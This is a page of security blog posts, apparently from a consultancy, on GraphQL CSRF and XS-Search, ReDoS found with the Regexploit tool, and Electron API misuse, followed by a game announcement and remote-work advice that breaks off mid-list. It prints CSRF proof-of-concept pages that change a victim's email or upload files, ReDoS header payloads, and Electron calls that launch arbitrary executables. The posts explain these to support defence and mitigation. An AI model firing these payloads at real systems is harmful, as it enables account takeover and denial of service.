During the fall of 2019, we embarked on a pretty ambitious goal despite the virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of 2020 spare time to work on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks!

Android: https://play.google.com/store/apps/details?id=com.CobbleGames.Hijack
iOS (iPhone and iPad) https://apps.apple.com/app/hijack-game/id1517609205

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

While playing, you might end up talking to John or Luca.

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

That single GraphQL issue that you keep missing

2021-05-20T00:00:00+02:00

With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.

GraphQL what?

GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:

Aggregating data from multiple sources
Decoupling the data from the database underneath, through a graph form
Ensuring input type correctness with minimal effort from the developers

CSRF eh?

Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.

GraphQL CSRF: more buzzword combos please!

POST-based CSRF

POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept Content-Type headers set to application/json only, which is widely believed to be invulnerable to CSRF. As multiple layers of middleware may translate the incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), GraphQL implementations are often affected by CSRF. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forego implementing proper CSRF protections.

The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

It is common, due to middleware magic, to have a server accepting the same request as form-urlencoded POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

Which a seasoned Burp user can quickly convert to a CSRF PoC through Engagement Tools > Generate CSRF PoC

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://redacted/graphql" method="POST">
      <input type="hidden" name="query" value="&#123;&#10;&#32;&#32;user&#32;&#123;&#10;&#32;&#32;&#32;&#32;firstName&#10;&#32;&#32;&#32;&#32;&#95;&#95;typename&#10;&#32;&#32;&#125;&#10;&#125;&#10;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the underlying application layer they are passed, any other query can be issued, including mutations.

GET Based CSRF

There are two common issues that we have spotted during our past engagements.

The first one is using GET requests for both queries and mutations.

For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.

While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wise.

For the sake of an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:

<!DOCTYPE html>
<html>
<head>
    <title>GraphQL CSRF file upload</title>
</head>
	<body>
		<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!) %20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType) %20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A %20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
	</body>
</html>

The second issue arises when a state-changing GraphQL operation is misplaced in the queries, which are normally non-state changing. In fact, most of the GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET HTTP method. Discovering this type of issues is trivial, and can be performed by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.

During an engagement, we discovered the following query that was issuing a state changing operation:

req := graphql.NewRequest(`
	query SetUserEmail($email: String!) {
		SetUserEmail(user_email: $email) {
			id
			email
		}
	}
`)

Given that the id value was easily guessable, we were able to prepare a CSRF PoC:

<!DOCTYPE html>
<html>
	<head>
		<title>GraphQL CSRF - State Changing Query</title> 
	</head>
	<body>
		<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A%26variables%3D%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%2C%0A%7D"></iframe>
	</body>
</html>

Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:

urlpatterns = patterns(
    # ...
    url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),
    # ...
)

CSRF: Better Safe Than Sorry

Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax, which protects from the most common CSRF vectors.

Other prevention methods can be implemented within each application. The most common are:

Built-in CSRF protection in modern frameworks
Origin verification
Double submit cookies
User interaction based protection
Not using GET request for state changing operations
Enhanced CSRF protection to GET request too

There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.

Rumbling The XS-Search

In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.

For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm for their existence/accessibility.

Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.

XS-Search is quite a neat and simple technique which can transform the following query in an attacker controlled binary search (eg. we can enumerate the users of a private platform):

query {
	isEmailAvailable(email:"foo@bar.com") {
		is_email_available
	}
}

In HTTP GET form:

GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...

The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.

Automate Everything!!!

As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.

For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.

InQL v4 can assist in detecting these issues:

By identifying various classes of CSRF through new “Send to Repeater” helpers:
- GET query parameters
- POST form-data
- POST x-form-urlencoded
By improving the query generation

Something for our beloved number crunchers!

We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days and no conclusiveness nor completeness should be inferred, numbers show an impressive amount of unpatched vulnerabilities:

14 (~50%) were vulnerable to some kind of XS-Search, equivalent to a GET-based CSRF
3 (~10%) were vulnerable to CSRF

TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!

References

Regexploit: DoS-able Regular Expressions

2021-03-11T00:00:00+01:00

When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.

Backtracking

To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)

That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

until it successfully matches a dot - $1="123.456"

123.456.789
123.456.789
123.456.789

The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.

123.456.789
123.456.789
123.456.789

Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

$2="456.789" but now there’s no dot! That can’t be the correct group 2…

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019. In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, awaits, requests and responses until regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

\d+[^\);]+[^\);]*\)

Digit characters are matched by \d and by [ˆ\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [ˆ\);]+ and [ˆ\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.

Regexploit

Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.

Results

The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba$[ \n\r\t]*(.+?)[ \n\r\t]*$

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba( 100,200, 10, 0.5 ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n³) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^
    (\d\d?)            # day
       (?:\s+|[-\/])
    (\w+)              # month
        (?:\s+|[-\/])
    (\d+)              # year
    (?:
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
       \s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1                        X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

Sorry, I wanted to shoehorn this comic in somewhere

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. There are also some regex features such as backreferences which had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.

Many tiny regexes

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids REDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.

Gotta catch ‘em all 🐛🐞🦠

CVE-2020-5243: uap-core affecting uap-python, uap-ruby, etc. (User-Agent header parsing)
CVE-2020-8492: cpython’s urllib.request (WWW-Authenticate header parsing)
CVE-2021-21236: CairoSVG (SVG parsing)
CVE-2021-21240: httplib2 (WWW-Authenticate header parsing)
CVE-2021-25292: python-pillow (PDF parsing)
CVE-2021-26813: python-markdown2 (Markdown parsing)
CVE-2021-27290: npm/ssri (SRI parsing)
CVE-2021-27291: pygments lexers for ADL, CADL, Ceylon, Evoque, Factor, Logos, Matlab, Octave, ODIN, Scilab & Varnish VCL (Syntax highlighting)
CVE-2021-27292: ua-parser-js (User-Agent header parsing)
CVE-2021-27293: RestSharp (JSON deserialisation in a .NET C# package)
bpo-38804: cpython’s http.cookiejar (Set-Cookie header parsing)
SimpleCrawler (archived) (HTML parsing)
CVE-2021-28092: to be released
Plus many more unpublished bugs in a handful of pypi, npm, ruby and nuget packages. We will update this list on https://github.com/doyensec/regexploit

Electron APIs Misuse: An Attacker’s First Choice

2021-02-16T00:00:00+01:00

ElectronJs is getting more secure every day. Context isolation and other security settings are planned to become enabled by default with the upcoming release of Electron 12 stable, seemingly ending the somewhat deserved reputation of a systemically insecure framework.

Seeing such significant and tangible progress makes us proud. Over the past years we’ve committed to helping developers securing their applications by researching different attack surfaces:

As confirmed by the Electron development team in the v11 stable release, they plan to release new major versions of Electron (including new versions of Chromium, Node, and V8), approximately quarterly. Such an ambitious versioning schedule will also increase the number and the frequency of newly introduced APIs, planned breaking changes, and consequent security nuances in upcoming versions. While new functionalities are certainly desirable, new framework’s APIs may also expose powerful interfaces to OS features, which may be more or less inadvertently enabled by developers falling for the syntactic sugar provided by Electron.

Such interfaces may be exposed to the renderer’s, either through preloads or insecure configurations, and can be abused by an attacker beyond their original purpose. An infamous example of this is openExternal.

Shell’s openExternal() allows opening a given external protocol URI with the desktop’s native utilities. For instance, on macOS, this function is similar to the open terminal command utility and will open the specific application based on the URI and filetype association. When openExternal is used with untrusted content, it can be leveraged to execute arbitrary commands, as demonstrated by the following example:

const {shell} = require('electron') 
shell.openExternal('file:///System/Applications/Calculator.app')

Similarly, shell.openPath(path) can be used to open the given file in the desktop’s default manner.

From an attacker’s perspective, Electron-specific APIs are very often the easiest path to gain remote code execution, read or write access to the host’s filesystem, or leak sensitive user’s data. Malicious JavaScript running in the renderer can often subvert the application using such primitives.

With this in mind, we gathered a non-comprehensive list of APIs we successfully abused during our past engagements. When exposed to the user in the renderer, these APIs can significantly affect the security posture of Electron-based applications and facilitate nodeIntegration / sandbox bypasses.

Remote.app

The remote module provides a way for the renderer processes to access APIs normally only available in the main process. In Electron, GUI-related modules (such as dialog, menu, etc.) are only available in the main process, not in the renderer process. In order to use them from the renderer process, the remote module is necessary to send inter-process messages to the main process.

While this seems pretty useful, this API has been a source of performance and security troubles for quite a while. As a result of that, the remote module will be deprecated in Electron 12, and eventually removed in Electron 14.

Despite the warnings and numerous articles on the topic, we have seen a few applications exposing Remote.app to the renderer. The app object controls the full application’s event lifecycle and it is basically the heart of every Electron-based application.

Many of the functions exposed by this object can be easily abused, including but not limited to:

app.relaunch([options]) Relaunches the app when current instance exits.
app.setAppLogsPath([path]) Sets or creates a directory your app’s logs which can then be manipulated with app.getPath() or app.setPath(pathName, newPath).
app.setAsDefaultProtocolClient(protocol[, path, args]) Sets the current executable as the default handler for a specified protocol.
app.setUserTasks(tasks) Adds tasks to the Tasks category of the Jump List (Windows only).
app.importCertificate(options, callback) Imports the certificate in pkcs12 format into the platform certificate store (Linux only).
app.moveToApplicationsFolder([options]) Move the application to the default Application folder (Mac only).
app.setJumpList(categories) Sets or removes a custom Jump List for the application (Windows only).
app.setLoginItemSettings(settings) Sets executables to launch at login with their options (Mac, Windows only).

Taking the first function as a way of example, app.relaunch([options]) can be used to relaunch the app when the current instance exits. Using this primitive, it is possible to specify a set of options, including a execPath property that will be executed for relaunch instead of the current app along with a custom args array that will be passed as command-line arguments. This functionality can be easily leveraged by an attacker to execute arbitrary commands.

Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()

Note that the relaunch method alone does not quit the app when executed, and it is also necessary to call app.quit() or app.exit() after calling the method to make the app restart.

systemPreferences

Another frequently exported module is systemPreferences. This API is used to get the system preferences and emit system events, and can therefore be abused to leak multiple pieces of information on the user’s behavior and their operating system activity and usage patterns. The metadata subtracted through the module could be then abused to mount targeted attacks.

subscribeNotification, subscribeWorkspaceNotification

These methods could be used to subscribe to native notifications of macOS. Under the hood, this API subscribes to NSDistributedNotificationCenter. Before macOS Catalina, it was possible to register a global listener and receive all distributed notifications by invoking the CFNotificationCenterAddObserver function with nil for the name parameter (corresponding to the event parameter of subscribeNotification). The callback specified would be invoked anytime a distributed notification is broadcasted by any app. Following the release of macOS Catalina or Big Sur, in the case of sandboxed applications it is still possible to globally sniff distributed notifications by registering to receive any notification by name. As a result, many sensitive events can be sniffed, including but not limited to:

Screen locks/unlocks
Screen saver start/stop
Bluetooth activity/HID Devices
Volume (USB, etc) mount/unmount
Network activity
User file downloads
Newly Installed Applications
Opened Source Code Files
Applications in Use
Loaded Kernel Extensions
…and more from the installed application including sensitive information in them. Distributed notifications will always be public by design, and it was never correct to put sensitive information in them.

The latest NSDistributedNotificationCenter API also seems to be having intermittent problems with Big Sur and sandboxed application, so we expected to see more breaking changes in the future.

getUserDefault, setUserDefault

The getUserDefault function returns the value of key in NSUserDefaults, a macOS simple storage class that provides a programmatic interface for interacting with the defaults system. This systemPreferences method can be abused to return the Application’s or Global’s Preferences. An attacker may abuse the API to retrieve sensitive information including the user’s location and filesystem resources. As a matter of demonstration, getUserDefault can be used to obtain personal details of the targeted application user:

User’s most recent locations on the file system

> Native.systemPreferences.getUserDefault("NSNavRecentPlaces","array")
(5) ["/tmp/secretfile", "/tmp/SecretResearch", "~/Desktop/Cellar/NSA_files", "/tmp/blog.doyensec.com/_posts", "~/Desktop/Invoices"]

User’s selected geographic location

Native.systemPreferences.getUserDefault("com.apple.TimeZonePref.Last_Selected_City","array")
(10) ["48.40311", "11.74905", "0", "Europe/Berlin", "DE", "Freising", "Germany", "Freising", "Germany", "DEPRECATED IN 10.6"]

Complementarily, the setUserDefault method can be weaponized to set User’s Default for the Application Preferences related to the target application. Before Electron v8.3.0 [1], [2] these methods can only get or set NSUserDefaults keys in the standard suite.

Shell.showItemInFolder

A subtle example of a potentially dangerous native Electron primitive is shell.showItemInFolder. As the name suggests, this API shows the given file in a file manager.

Such seemingly innocuous functionality hides some peculiarities that could be dangerous from a security perspective.

On Linux (/shell/common/platform_util_linux.cc), Electron extracts the parent directory name, checks if the resulting path is actually a directory and then uses XDGOpen (xdg-open) to show the file in its location:

void ShowItemInFolder(const base::FilePath& full_path) {
  base::FilePath dir = full_path.DirName();
  if (!base::DirectoryExists(dir))
    return;

  XDGOpen(dir.value(), false, platform_util::OpenCallback());
}

xdg-open can be leveraged for executing applications on the victim’s computer.

“If a file is provided the file will be opened in the preferred application for files of that type” (https://linux.die.net/man/1/xdg-open)

Because of the inherited time of check time of use (TOCTOU) condition caused by the time difference between the directory existence check and its launch with xdg-open, an attacker could run an executable of choice by replacing the folder path with an arbitrary file, winning the race introduced by the check. While this issue is rather tricky to be exploited in the context of an insecure Electron’s renderer, it is certainly a potential step in a more complex vulnerabilities chain.

On Windows (/shell/common/platform_util_win.cc), the situation is even more tricky:

void ShowItemInFolderOnWorkerThread(const base::FilePath& full_path) {
...
  base::win::ScopedCoMem<ITEMIDLIST> dir_item;
  hr = desktop->ParseDisplayName(NULL, NULL,
                                 const_cast<wchar_t*>(dir.value().c_str()),
                                 NULL, &dir_item, NULL);

  const ITEMIDLIST* highlight[] = {file_item};
  hr = SHOpenFolderAndSelectItems(dir_item, base::size(highlight), highlight,
                                  NULL);
...
 if (FAILED(hr)) {
 	if (hr == ERROR_FILE_NOT_FOUND) {
      ShellExecute(NULL, L"open", dir.value().c_str(), NULL, NULL, SW_SHOW);
    } else {
      LOG(WARNING) << " " << __func__ << "(): Can't open full_path = \""
                   << full_path.value() << "\""
                   << " hr = " << logging::SystemErrorCodeToString(hr);
    }
  }
}

Under normal circustances, the SHOpenFolderAndSelectItems Windows API (from shlobj_core.h) is used. However, Electron introduced a fall-back mechanism as the call mysteriously fails with a “file not found” exception on old Windows systems. In these cases, ShellExecute is used as a fallback, specifying “open” as the lpVerb parameter. According to the Windows Shell documentation, the “open” object verb launches the specified file or application. If this file is not an executable file, its associated application is launched.

While the exploitability of these quirks is up to discussions, these examples showcase how innoucous APIs might introduce OS-dependent security risks. In fact, Chromium has refactored the code in question to avoid the use of xdg-open altogether and leverage dbus instead.

The Electron APIs illustrated in this blog post are just a few notable examples of potentially dangerous primitives that are available in the framework. As Electron will become more and more integrated with all supported operating systems, we expect this list to increase over time. As we often repeat, know your framework (and its limitations) and adopt defense in depth mechanisms to mitigate such deficiencies.

As a company, we will continue to devote our 25% research time to secure the ElectronJS ecosystem and improve Electronegativity.

Psychology of Remote Work

2020-12-17T00:00:00+01:00

This is the first in a series of non-technical blog posts aiming at discussing the opportunities and challenges that arise when running a small information security consulting company. After all, day to day life at Doyensec is not only about computers and stories of breaking bits.

The pandemic has deeply affected standard office work and forced us to immediately change our habits. In all probability, no one could have predicted that suddenly the office was going to be “moved”, and the new location is a living room. Remote work has been a hot topic for many years, however the current situation has certainly accelerated the adoption and forced companies to make a change.

At Doyensec, we’ve been a 100% remote company since day one. In this blog post, we’d like to present our best practices and also list some of the myths which surround the idea of remote work. This article is based on our personal experience and will hopefully help the reader to work at home more efficiently. There are no magic recipes here, just a collection of things that work for us.

5 standard rules we follow and 7 myths that we believe are false

Five Golden Rules

1. “Work” separated from the “Home” zone

The most effective solution is to work in a separate and dedicated room, which automatically becomes your office. It is important to physically separate somehow the workplace from the rest of the house, e.g. a screen, small bookcase or curtain. The worst thing you can do is work on the couch or bed where you usually rest. We try not to review source code from the place where we normally eat snacks, or debug an application in the same place we sleep. If possible, work at a desk. It will also be easier for you to mobilize yourself for a specific activity. Also, make sure that your household, especially your young children, do not play in your “office area”. It will be best if this “home office space” belongs exclusively to you.

2. The importance of a workplace

Prepare a desk with adequate lighting and a comfortable chair. We emphasize the need for a functional, ergonomic chair, and not simply an armchair. It’s about working effectively. The time to relax will come later. Arrange everything so that you work with ease. Notebooks and other materials should be tidied up on the desk and kept neat. This will be a clear, distinguishing feature of the work place. Family members should know that this is a work area from the way it looks. It will be easier for them to get used to the fact that instead of “going to work,” work related responsibilities will be performed at home. Also, this setup gives an opportunity to make security testing more efficient - for example by setting up bigger screens and ready to use testing equipment.

3. Control your time (establish a routine)

A flexible working time can be treacherous. There are times when an eight hour working day is sufficient to complete an important project. On the other hand, there are situations where various distractions can take attention away from an assigned task. In order to avoid this type of scenario, fixed working hours must be established. For example, some Doyensec employees use BeFocused and Timing apps to regulate their time. Intuitive and user friendly applications will help you balance your private and professional life and will also remind you when it’s time to take a break. Working long hours with no breaks is the main source of burnout.

4. Find excuses to leave your house (vary the routine)

Traditional work is usually based on a structured day spent in an office environment. The day is organized into work sessions and breaks. When working at home, on the other hand, time must be allotted for non-work related responsibilities on a more subjective basis. It is important for the routine to be elastic enough to include breaks for everything from physical activity (walks) to shopping (groceries) and social interaction. Leaving the house regularly is very beneficial. A break will bring on a refreshed perspective. The current pandemic is obviously the reason why people spend more time inside. Outside physical activities are very important to keep our minds fresh and a set of new endorphins is always welcome. As proof of evidence, our best bugs are usually discovered after a run or a walk outside!

5. Avoid distractions

While this sounds like simple and intuitive advice, avoiding distractions is actually really difficult! In general it’s good to turn off notifications on your computer or phone, especially while working. We trust our people and they don’t have to be immediately 100% reachable when working. As long as our consultants provide updates and results when needed, it is perfectly fine to shutdown email and other communication channels. Depending on personal preference, some individuals require complete silence, while others can accomplish their work while listening to music. If you belong to that category of people who cannot work in absolute silence and normal music levels are too intense, consider using white noise. There are applications available that you can use to create a neutral soundtrack that helps you to concentrate. You can easily follow our recommendation on Spotify: something calm, maybe jazz style or classy.

Seven Myths

Let’s now talk about some myths related to remote work:

1. Remote employees have no control over projects

At Doyensec, we have successfully delivered hundreds of projects that were done exclusively remotely. If we are delivering a small project, we usually allocate one security researcher who is able to start the project from scratch and deliver a high quality deliverable, but sometimes we have 2-3 consultants working on the same engagement and the outcome is of the same quality. Most of our communication goes through (PGP-encrypted) emails. An instant messenger can help a great deal when answers are needed quickly. The real challenge is in hiring the right people who can control the project regardless of their physical location. While employing people for our company, we look at both technical and project management skills. According to Jason Fried and Davis Heinemeier Hansson, 37 Signal co-founders, you shouldn’t hire people you don’t trust (Remote). We totally agree with this statement.

2. Remote employees cannot learn from colleagues

